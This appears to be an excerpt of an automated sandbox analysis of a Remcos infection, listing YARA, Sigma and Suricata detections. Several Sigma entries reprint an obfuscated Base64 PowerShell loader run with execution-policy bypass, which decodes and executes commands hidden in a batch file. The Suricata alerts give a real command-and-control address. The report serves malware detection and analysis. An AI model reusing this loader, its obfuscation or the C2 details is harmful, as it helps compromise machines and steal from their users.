5.2.powershell.exe.8a51288.5.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x644e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64478:$s1: CoGetObject 0x6448c:$s1: CoGetObject 0x644a8:$s1: CoGetObject 0x6e256:$s1: CoGetObject 0x64438:$s2: Elevation:Administrator!new:
Click to see the 11 entries

Other

Source	Rule	Description	Author	Strings
amsi32_7976.amsi.csv	JoeSecurity_BatchInjector	Yara detected Batch Injector	Joe Security
amsi32_7976.amsi.csv	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vya2xyZ3JOYW1lIGtscmdyPSAkZW5rbHJncnY6VVNFa2xyZ3JSTkFNRWtscmdyOyRqbWRrbHJncm9tID0ga2xyZ3IiQzpcVWtscmdyc2Vyc1xrbHJnciR1c2Vya2xyZ3JOYW1lXGtscmdyZHdtLmJrbHJncmF0Ijtpa2xyZ3JmIChUZWtscmdyc3QtUGFrbHJncnRoICRqa2xyZ3JtZG9tKWtscmdyIHsgICBrbHJnciBXcml0a2xyZ3JlLUhvc2tscmdydCAiQmFrbHJncnRjaCBma2xyZ3JpbGUgZmtscmdyb3VuZDprbHJnciAkam1ka2xyZ3JvbSIgLWtscmdyRm9yZWdrbHJncnJvdW5ka2xyZ3JDb2xvcmtscmdyIEN5YW5rbHJncjsgICAga2xyZ3IkZmlsZWtscmdyTGluZXNrbHJnciA9IFtTa2xyZ3J5c3RlbWtscmdyLklPLkZrbHJncmlsZV06a2xyZ3I6UmVhZGtscmdyQWxsTGlrbHJncm5lcygka2xyZ3JqbWRvbWtscmdyLCBbU3lrbHJncnN0ZW0ua2xyZ3JUZXh0LmtscmdyRW5jb2RrbHJncmluZ106a2xyZ3I6VVRGOGtscmdyKTsgICBrbHJnciBmb3Jla2xyZ3JhY2ggKGtscmdyJGxpbmVrbHJnciBpbiAka2xyZ3JmaWxlTGtscmdyaW5lcylrbHJnciB7ICAga2xyZ3IgICAgIGtscmdyaWYgKCRrbHJncmxpbmUga2xyZ3ItbWF0Y2tscmdyaCAnXjprbHJncjo6ID8oa2xyZ3IuKykkJ2tscmdyKSB7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyV3JpdGVrbHJnci1Ib3N0a2xyZ3IgIkluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlIGRldGtscmdyZWN0ZWRrbHJnciBpbiB0a2xyZ3JoZSBiYWtscmdydGNoIGZrbHJncmlsZS4ia2xyZ3IgLUZvcmtscmdyZWdyb3VrbHJncm5kQ29sa2xyZ3JvciBDeWtscmdyYW47ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdydHJ5IHtrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAkZGVja2xyZ3JvZGVkQmtscmdyeXRlcyBrbHJncj0gW1N5a2xyZ3JzdGVtLmtscmdyQ29udmVrbHJncnJ0XTo6a2xyZ3JGcm9tQmtscmdyYXNlNjRrbHJnclN0cmlua2xyZ3JnKCRtYWtscmdydGNoZXNrbHJnclsxXS5Ua2xyZ3JyaW0oKWtscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgJGlrbHJncm5qZWN0a2xyZ3Jpb25Db2tscmdyZGUgPSBrbHJncltTeXN0a2xyZ3JlbS5UZWtscmdyeHQuRW5rbHJncmNvZGlua2xyZ3JnXTo6VWtscmdybmljb2RrbHJncmUuR2V0a2xyZ3JTdHJpbmtscmdyZygkZGVrbHJncmNvZGVka2xyZ3JCeXRlc2tscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgV3JrbHJncml0ZS1Ia2xyZ3Jvc3QgImtscmdySW5qZWNrbHJncnRpb24ga2xyZ3Jjb2RlIGtscmdyZGVjb2RrbHJncmVkIHN1a2xyZ3JjY2Vzc2tscmdyZnVsbHlrbHJnci4iIC1Ga2xyZ3JvcmVncmtscmdyb3VuZENrbHJncm9sb3Iga2xyZ3JHcmVlbmtscmdyOyAgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICBXcmlrbHJncnRlLUhva2xyZ3JzdCAiRWtscmdyeGVjdXRrbHJncmluZyBpa2xyZ3JuamVjdGtscmdyaW9uIGNrbHJncm9kZS4ua2xyZ3IuIiAtRmtscmdyb3JlZ3JrbHJncm91bmRDa2xyZ3JvbG9yIGtscmdyWWVsbG9rbHJncnc7ICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgIElua2xyZ3J2b2tlLWtscmdyRXhwcmVrbHJncnNzaW9ua2xyZ3IgJGluamtscmdyZWN0aW9rbHJncm5Db2Rla2xyZ3I7ICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3IgIGJyZWtscmdyYWs7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyfSBjYXRrbHJncmNoIHsga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3JXcml0ZWtscmdyLUhvc3RrbHJnciAiRXJya2xyZ3JvciBkdWtscmdycmluZyBrbHJncmRlY29ka2xyZ3Jpbmcgb2tscmdyciBleGVrbHJncmN1dGlua2xyZ3JnIGluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlOiAkX2tscmdyIiAtRm9rbHJncnJlZ3Jva2xyZ3J1bmRDb2tscmdybG9yIFJrbHJncmVkOyAga2xyZ3IgICAgIGtscmdyICAgICBrbHJncn07ICAga2xyZ3IgICAgIGtscmdyfTsgICBrbHJnciB9O30ga2xyZ3JlbHNlIGtscmdyeyAgICBrbHJnciAgV3Jpa2xyZ3J0ZS1Ib2tscmdyc3QgIlNrbHJncnlzdGVta2xyZ3IgRXJyb2tscmdycjogQmFrbHJncnRjaCBma2xyZ3JpbGUgbmtscmdyb3QgZm9rbHJn

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: PowerShell Base64 Encoded Invoke Keyword

Source: Process started

Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vya2xyZ3JOYW1lIGtscmdyPSAkZW5rbHJncnY6VVNFa2xyZ3JSTkFNRWtscmdyOyRqbWRrbHJncm9tID0ga2xyZ3IiQzpcVWtscmdyc2Vyc1xrbHJnciR1c2Vya2xyZ3JOYW1lXGtscmdyZHdtLmJrbHJncmF0Ijtpa2xyZ3JmIChUZWtscmdyc3QtUGFrbHJncnRoICRqa2xyZ3JtZG9tKWtscmdyIHsgICBrbHJnciBXcml0a2xyZ3JlLUhvc2tscmdydCAiQmFrbHJncnRjaCBma2xyZ3JpbGUgZmtscmdyb3VuZDprbHJnciAkam1ka2xyZ3JvbSIgLWtscmdyRm9yZWdrbHJncnJvdW5ka2xyZ3JDb2xvcmtscmdyIEN5YW5rbHJncjsgICAga2xyZ3IkZmlsZWtscmdyTGluZXNrbHJnciA9IFtTa2xyZ3J5c3RlbWtscmdyLklPLkZrbHJncmlsZV06a2xyZ3I6UmVhZGtscmdyQWxsTGlrbHJncm5lcygka2xyZ3JqbWRvbWtscmdyLCBbU3lrbHJncnN0ZW0ua2xyZ3JUZXh0LmtscmdyRW5jb2RrbHJncmluZ106a2xyZ3I6VVRGOGtscmdyKTsgICBrbHJnciBmb3Jla2xyZ3JhY2ggKGtscmdyJGxpbmVrbHJnciBpbiAka2xyZ3JmaWxlTGtscmdyaW5lcylrbHJnciB7ICAga2xyZ3IgICAgIGtscmdyaWYgKCRrbHJncmxpbmUga2xyZ3ItbWF0Y2tscmdyaCAnXjprbHJncjo6ID8oa2xyZ3IuKykkJ2tscmdyKSB7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyV3JpdGVrbHJnci1Ib3N0a2xyZ3IgIkluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlIGRldGtscmdyZWN0ZWRrbHJnciBpbiB0a2xyZ3JoZSBiYWtscmdydGNoIGZrbHJncmlsZS4ia2xyZ3IgLUZvcmtscmdyZWdyb3VrbHJncm5kQ29sa2xyZ3JvciBDeWtscmdyYW47ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdydHJ5IHtrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAkZGVja2xyZ3JvZGVkQmtscmdyeXRlcyBrbHJncj0gW1N5a2xyZ3JzdGVtLmtscmdyQ29udmVrbHJncnJ0XTo6a2xyZ3JGcm9tQmtscmdyYXNlNjRrbHJnclN0cmlua2xyZ3JnKCRtYWtscmdydGNoZXNrbHJnclsxXS5Ua2xyZ3JyaW0oKWtscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgJGlrbHJncm5qZWN0a2xyZ3Jpb25Db2tscmdyZGUgPSBrbHJncltTeXN0a2xyZ3JlbS5UZWtscmdyeHQuRW5rbHJncmNvZGlua2xyZ3JnXTo6VWtscmdybmljb2RrbHJncmUuR2V0a2xyZ3JTdHJpbmtscmdyZygkZGVrbHJncmNvZGVka2xyZ3JCeXRlc2tscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgV3JrbHJncml0ZS1Ia2xyZ3Jvc3QgImtscmdySW5qZWNrbHJncnRpb24ga2xyZ3Jjb2RlIGtscmdyZGVjb2RrbHJncmVkIHN1a2xyZ3JjY2Vzc2tscmdyZnVsbHlrbHJnci4iIC1Ga2xyZ3JvcmVncmtscmdyb3VuZENrbHJncm9sb3Iga2xyZ3JHcmVlbmtscmdyOyAgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICBXcmlrbHJncnRlLUhva2xyZ3JzdCAiRWtscmdyeGVjdXRrbHJncmluZyBpa2xyZ3JuamVjdGtscmdyaW9uIGNrbHJncm9kZS4ua2xyZ3IuIiAtRmtscmdyb3JlZ3JrbHJncm91bmRDa2xyZ3JvbG9yIGtscmdyWWVsbG9rbHJncnc7ICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgIElua2xyZ3J2b2tlLWtscmdyRXhwcmVrbHJncnNzaW9ua2xyZ3IgJGluamtscmdyZWN0aW9rbHJncm5Db2Rla2xyZ3I7ICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3IgIGJyZWtscmdyYWs7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyfSBjYXRrbHJncmNoIHsga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3JXcml0ZWtscmdyLUhvc3RrbHJnciAiRXJya2xyZ3JvciBkdWtscmdycmluZyBrbHJncmRlY29ka2xyZ3Jpbmcgb2tscmdyciBleGVrbHJncmN1dGlua2xyZ3JnIGluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlOiAkX2tscmdyIiAtRm9rbHJncnJlZ3Jva2xyZ3J1bmRDb2tscmdybG9yIFJrbHJncmVkOyAga2xyZ3IgICAgIGtscmdyICAgICBrbHJncn07ICAga2xyZ3IgICAgIGtscmdyfTsgICBrbHJnciB9O30ga2xyZ3JlbHNlIGtscmdyeyAgICBrbHJnciAgV3Jpa2xyZ3J0ZS1Ib2tscmdyc3QgIlNrbHJncnlzdGVta2xyZ3IgRXJyb2tscmdycjogQmFrbHJncnRjaCBma2xyZ3JpbGUgbmtscmdyb3QgZm9rbHJn

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vya2xyZ3JOYW1lIGtscmdyPSAkZW5rbHJncnY6VVNFa2xyZ3JSTkFNRWtscmdyOyRqbWRrbHJncm9tID0ga2xyZ3IiQzpcVWtscmdyc2Vyc1xrbHJnciR1c2Vya2xyZ3JOYW1lXGtscmdyZHdtLmJrbHJncmF0Ijtpa2xyZ3JmIChUZWtscmdyc3QtUGFrbHJncnRoICRqa2xyZ3JtZG9tKWtscmdyIHsgICBrbHJnciBXcml0a2xyZ3JlLUhvc2tscmdydCAiQmFrbHJncnRjaCBma2xyZ3JpbGUgZmtscmdyb3VuZDprbHJnciAkam1ka2xyZ3JvbSIgLWtscmdyRm9yZWdrbHJncnJvdW5ka2xyZ3JDb2xvcmtscmdyIEN5YW5rbHJncjsgICAga2xyZ3IkZmlsZWtscmdyTGluZXNrbHJnciA9IFtTa2xyZ3J5c3RlbWtscmdyLklPLkZrbHJncmlsZV06a2xyZ3I6UmVhZGtscmdyQWxsTGlrbHJncm5lcygka2xyZ3JqbWRvbWtscmdyLCBbU3lrbHJncnN0ZW0ua2xyZ3JUZXh0LmtscmdyRW5jb2RrbHJncmluZ106a2xyZ3I6VVRGOGtscmdyKTsgICBrbHJnciBmb3Jla2xyZ3JhY2ggKGtscmdyJGxpbmVrbHJnciBpbiAka2xyZ3JmaWxlTGtscmdyaW5lcylrbHJnciB7ICAga2xyZ3IgICAgIGtscmdyaWYgKCRrbHJncmxpbmUga2xyZ3ItbWF0Y2tscmdyaCAnXjprbHJncjo6ID8oa2xyZ3IuKykkJ2tscmdyKSB7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyV3JpdGVrbHJnci1Ib3N0a2xyZ3IgIkluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlIGRldGtscmdyZWN0ZWRrbHJnciBpbiB0a2xyZ3JoZSBiYWtscmdydGNoIGZrbHJncmlsZS4ia2xyZ3IgLUZvcmtscmdyZWdyb3VrbHJncm5kQ29sa2xyZ3JvciBDeWtscmdyYW47ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdydHJ5IHtrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAkZGVja2xyZ3JvZGVkQmtscmdyeXRlcyBrbHJncj0gW1N5a2xyZ3JzdGVtLmtscmdyQ29udmVrbHJncnJ0XTo6a2xyZ3JGcm9tQmtscmdyYXNlNjRrbHJnclN0cmlua2xyZ3JnKCRtYWtscmdydGNoZXNrbHJnclsxXS5Ua2xyZ3JyaW0oKWtscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgJGlrbHJncm5qZWN0a2xyZ3Jpb25Db2tscmdyZGUgPSBrbHJncltTeXN0a2xyZ3JlbS5UZWtscmdyeHQuRW5rbHJncmNvZGlua2xyZ3JnXTo6VWtscmdybmljb2RrbHJncmUuR2V0a2xyZ3JTdHJpbmtscmdyZygkZGVrbHJncmNvZGVka2xyZ3JCeXRlc2tscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgV3JrbHJncml0ZS1Ia2xyZ3Jvc3QgImtscmdySW5qZWNrbHJncnRpb24ga2xyZ3Jjb2RlIGtscmdyZGVjb2RrbHJncmVkIHN1a2xyZ3JjY2Vzc2tscmdyZnVsbHlrbHJnci4iIC1Ga2xyZ3JvcmVncmtscmdyb3VuZENrbHJncm9sb3Iga2xyZ3JHcmVlbmtscmdyOyAgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICBXcmlrbHJncnRlLUhva2xyZ3JzdCAiRWtscmdyeGVjdXRrbHJncmluZyBpa2xyZ3JuamVjdGtscmdyaW9uIGNrbHJncm9kZS4ua2xyZ3IuIiAtRmtscmdyb3JlZ3JrbHJncm91bmRDa2xyZ3JvbG9yIGtscmdyWWVsbG9rbHJncnc7ICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgIElua2xyZ3J2b2tlLWtscmdyRXhwcmVrbHJncnNzaW9ua2xyZ3IgJGluamtscmdyZWN0aW9rbHJncm5Db2Rla2xyZ3I7ICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3IgIGJyZWtscmdyYWs7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyfSBjYXRrbHJncmNoIHsga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3JXcml0ZWtscmdyLUhvc3RrbHJnciAiRXJya2xyZ3JvciBkdWtscmdycmluZyBrbHJncmRlY29ka2xyZ3Jpbmcgb2tscmdyciBleGVrbHJncmN1dGlua2xyZ3JnIGluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlOiAkX2tscmdyIiAtRm9rbHJncnJlZ3Jva2xyZ3J1bmRDb2tscmdybG9yIFJrbHJncmVkOyAga2xyZ3IgICAgIGtscmdyICAgICBrbHJncn07ICAga2xyZ3IgICAgIGtscmdyfTsgICBrbHJnciB9O30ga2xyZ3JlbHNlIGtscmdyeyAgICBrbHJnciAgV3Jpa2xyZ3J0ZS1Ib2tscmdyc3QgIlNrbHJncnlzdGVta2xyZ3IgRXJyb2tscmdycjogQmFrbHJncnRjaCBma2xyZ3JpbGUgbmtscmdyb3QgZm9rbHJn

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vya2xyZ3JOYW1lIGtscmdyPSAkZW5rbHJncnY6VVNFa2xyZ3JSTkFNRWtscmdyOyRqbWRrbHJncm9tID0ga2xyZ3IiQzpcVWtscmdyc2Vyc1xrbHJnciR1c2Vya2xyZ3JOYW1lXGtscmdyZHdtLmJrbHJncmF0Ijtpa2xyZ3JmIChUZWtscmdyc3QtUGFrbHJncnRoICRqa2xyZ3JtZG9tKWtscmdyIHsgICBrbHJnciBXcml0a2xyZ3JlLUhvc2tscmdydCAiQmFrbHJncnRjaCBma2xyZ3JpbGUgZmtscmdyb3VuZDprbHJnciAkam1ka2xyZ3JvbSIgLWtscmdyRm9yZWdrbHJncnJvdW5ka2xyZ3JDb2xvcmtscmdyIEN5YW5rbHJncjsgICAga2xyZ3IkZmlsZWtscmdyTGluZXNrbHJnciA9IFtTa2xyZ3J5c3RlbWtscmdyLklPLkZrbHJncmlsZV06a2xyZ3I6UmVhZGtscmdyQWxsTGlrbHJncm5lcygka2xyZ3JqbWRvbWtscmdyLCBbU3lrbHJncnN0ZW0ua2xyZ3JUZXh0LmtscmdyRW5jb2RrbHJncmluZ106a2xyZ3I6VVRGOGtscmdyKTsgICBrbHJnciBmb3Jla2xyZ3JhY2ggKGtscmdyJGxpbmVrbHJnciBpbiAka2xyZ3JmaWxlTGtscmdyaW5lcylrbHJnciB7ICAga2xyZ3IgICAgIGtscmdyaWYgKCRrbHJncmxpbmUga2xyZ3ItbWF0Y2tscmdyaCAnXjprbHJncjo6ID8oa2xyZ3IuKykkJ2tscmdyKSB7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyV3JpdGVrbHJnci1Ib3N0a2xyZ3IgIkluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlIGRldGtscmdyZWN0ZWRrbHJnciBpbiB0a2xyZ3JoZSBiYWtscmdydGNoIGZrbHJncmlsZS4ia2xyZ3IgLUZvcmtscmdyZWdyb3VrbHJncm5kQ29sa2xyZ3JvciBDeWtscmdyYW47ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdydHJ5IHtrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAkZGVja2xyZ3JvZGVkQmtscmdyeXRlcyBrbHJncj0gW1N5a2xyZ3JzdGVtLmtscmdyQ29udmVrbHJncnJ0XTo6a2xyZ3JGcm9tQmtscmdyYXNlNjRrbHJnclN0cmlua2xyZ3JnKCRtYWtscmdydGNoZXNrbHJnclsxXS5Ua2xyZ3JyaW0oKWtscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgJGlrbHJncm5qZWN0a2xyZ3Jpb25Db2tscmdyZGUgPSBrbHJncltTeXN0a2xyZ3JlbS5UZWtscmdyeHQuRW5rbHJncmNvZGlua2xyZ3JnXTo6VWtscmdybmljb2RrbHJncmUuR2V0a2xyZ3JTdHJpbmtscmdyZygkZGVrbHJncmNvZGVka2xyZ3JCeXRlc2tscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgV3JrbHJncml0ZS1Ia2xyZ3Jvc3QgImtscmdySW5qZWNrbHJncnRpb24ga2xyZ3Jjb2RlIGtscmdyZGVjb2RrbHJncmVkIHN1a2xyZ3JjY2Vzc2tscmdyZnVsbHlrbHJnci4iIC1Ga2xyZ3JvcmVncmtscmdyb3VuZENrbHJncm9sb3Iga2xyZ3JHcmVlbmtscmdyOyAgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICBXcmlrbHJncnRlLUhva2xyZ3JzdCAiRWtscmdyeGVjdXRrbHJncmluZyBpa2xyZ3JuamVjdGtscmdyaW9uIGNrbHJncm9kZS4ua2xyZ3IuIiAtRmtscmdyb3JlZ3JrbHJncm91bmRDa2xyZ3JvbG9yIGtscmdyWWVsbG9rbHJncnc7ICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgIElua2xyZ3J2b2tlLWtscmdyRXhwcmVrbHJncnNzaW9ua2xyZ3IgJGluamtscmdyZWN0aW9rbHJncm5Db2Rla2xyZ3I7ICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3IgIGJyZWtscmdyYWs7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyfSBjYXRrbHJncmNoIHsga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3JXcml0ZWtscmdyLUhvc3RrbHJnciAiRXJya2xyZ3JvciBkdWtscmdycmluZyBrbHJncmRlY29ka2xyZ3Jpbmcgb2tscmdyciBleGVrbHJncmN1dGlua2xyZ3JnIGluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlOiAkX2tscmdyIiAtRm9rbHJncnJlZ3Jva2xyZ3J1bmRDb2tscmdybG9yIFJrbHJncmVkOyAga2xyZ3IgICAgIGtscmdyICAgICBrbHJncn07ICAga2xyZ3IgICAgIGtscmdyfTsgICBrbHJnciB9O30ga2xyZ3JlbHNlIGtscmdyeyAgICBrbHJnciAgV3Jpa2xyZ3J0ZS1Ib2tscmdyc3QgIlNrbHJncnlzdGVta2xyZ3IgRXJyb2tscmdycjogQmFrbHJncnRjaCBma2xyZ3JpbGUgbmtscmdyb3QgZm9rbHJn

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vya2xyZ3JOYW1lIGtscmdyPSAkZW5rbHJncnY6VVNFa2xyZ3JSTkFNRWtscmdyOyRqbWRrbHJncm9tID0ga2xyZ3IiQzpcVWtscmdyc2Vyc1xrbHJnciR1c2Vya2xyZ3JOYW1lXGtscmdyZHdtLmJrbHJncmF0Ijtpa2xyZ3JmIChUZWtscmdyc3QtUGFrbHJncnRoICRqa2xyZ3JtZG9tKWtscmdyIHsgICBrbHJnciBXcml0a2xyZ3JlLUhvc2tscmdydCAiQmFrbHJncnRjaCBma2xyZ3JpbGUgZmtscmdyb3VuZDprbHJnciAkam1ka2xyZ3JvbSIgLWtscmdyRm9yZWdrbHJncnJvdW5ka2xyZ3JDb2xvcmtscmdyIEN5YW5rbHJncjsgICAga2xyZ3IkZmlsZWtscmdyTGluZXNrbHJnciA9IFtTa2xyZ3J5c3RlbWtscmdyLklPLkZrbHJncmlsZV06a2xyZ3I6UmVhZGtscmdyQWxsTGlrbHJncm5lcygka2xyZ3JqbWRvbWtscmdyLCBbU3lrbHJncnN0ZW0ua2xyZ3JUZXh0LmtscmdyRW5jb2RrbHJncmluZ106a2xyZ3I6VVRGOGtscmdyKTsgICBrbHJnciBmb3Jla2xyZ3JhY2ggKGtscmdyJGxpbmVrbHJnciBpbiAka2xyZ3JmaWxlTGtscmdyaW5lcylrbHJnciB7ICAga2xyZ3IgICAgIGtscmdyaWYgKCRrbHJncmxpbmUga2xyZ3ItbWF0Y2tscmdyaCAnXjprbHJncjo6ID8oa2xyZ3IuKykkJ2tscmdyKSB7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyV3JpdGVrbHJnci1Ib3N0a2xyZ3IgIkluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlIGRldGtscmdyZWN0ZWRrbHJnciBpbiB0a2xyZ3JoZSBiYWtscmdydGNoIGZrbHJncmlsZS4ia2xyZ3IgLUZvcmtscmdyZWdyb3VrbHJncm5kQ29sa2xyZ3JvciBDeWtscmdyYW47ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdydHJ5IHtrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAkZGVja2xyZ3JvZGVkQmtscmdyeXRlcyBrbHJncj0gW1N5a2xyZ3JzdGVtLmtscmdyQ29udmVrbHJncnJ0XTo6a2xyZ3JGcm9tQmtscmdyYXNlNjRrbHJnclN0cmlua2xyZ3JnKCRtYWtscmdydGNoZXNrbHJnclsxXS5Ua2xyZ3JyaW0oKWtscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgJGlrbHJncm5qZWN0a2xyZ3Jpb25Db2tscmdyZGUgPSBrbHJncltTeXN0a2xyZ3JlbS5UZWtscmdyeHQuRW5rbHJncmNvZGlua2xyZ3JnXTo6VWtscmdybmljb2RrbHJncmUuR2V0a2xyZ3JTdHJpbmtscmdyZygkZGVrbHJncmNvZGVka2xyZ3JCeXRlc2tscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgV3JrbHJncml0ZS1Ia2xyZ3Jvc3QgImtscmdySW5qZWNrbHJncnRpb24ga2xyZ3Jjb2RlIGtscmdyZGVjb2RrbHJncmVkIHN1a2xyZ3JjY2Vzc2tscmdyZnVsbHlrbHJnci4iIC1Ga2xyZ3JvcmVncmtscmdyb3VuZENrbHJncm9sb3Iga2xyZ3JHcmVlbmtscmdyOyAgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICBXcmlrbHJncnRlLUhva2xyZ3JzdCAiRWtscmdyeGVjdXRrbHJncmluZyBpa2xyZ3JuamVjdGtscmdyaW9uIGNrbHJncm9kZS4ua2xyZ3IuIiAtRmtscmdyb3JlZ3JrbHJncm91bmRDa2xyZ3JvbG9yIGtscmdyWWVsbG9rbHJncnc7ICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgIElua2xyZ3J2b2tlLWtscmdyRXhwcmVrbHJncnNzaW9ua2xyZ3IgJGluamtscmdyZWN0aW9rbHJncm5Db2Rla2xyZ3I7ICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3IgIGJyZWtscmdyYWs7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyfSBjYXRrbHJncmNoIHsga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3JXcml0ZWtscmdyLUhvc3RrbHJnciAiRXJya2xyZ3JvciBkdWtscmdycmluZyBrbHJncmRlY29ka2xyZ3Jpbmcgb2tscmdyciBleGVrbHJncmN1dGlua2xyZ3JnIGluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlOiAkX2tscmdyIiAtRm9rbHJncnJlZ3Jva2xyZ3J1bmRDb2tscmdybG9yIFJrbHJncmVkOyAga2xyZ3IgICAgIGtscmdyICAgICBrbHJncn07ICAga2xyZ3IgICAgIGtscmdyfTsgICBrbHJnciB9O30ga2xyZ3JlbHNlIGtscmdyeyAgICBrbHJnciAgV3Jpa2xyZ3J0ZS1Ib2tscmdyc3QgIlNrbHJncnlzdGVta2xyZ3IgRXJyb2tscmdycjogQmFrbHJncnRjaCBma2xyZ3JpbGUgbmtscmdyb3QgZm9rbHJn

Suricata Signatures

ET MALWARE Remcos 3.x Unencrypted Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-17T02:03:00.314781+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49721	176.65.142.140	3990	TCP

ET MALWARE Remcos 3.x Unencrypted Server Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-17T02:03:00.997090+0100	2032777	1	Malware Command and Control Activity Detected	176.65.142.140	3990	192.168.2.4	49721	TCP
2025-03-17T02:05:04.778821+0100	2032777	1	Malware Command and Control Activity Detected	176.65.142.140	3990	192.168.2.4	49721	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-17T02:03:01.838250+0100	2803304	3	Unknown Traffic	192.168.2.4	49723	178.237.33.50	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

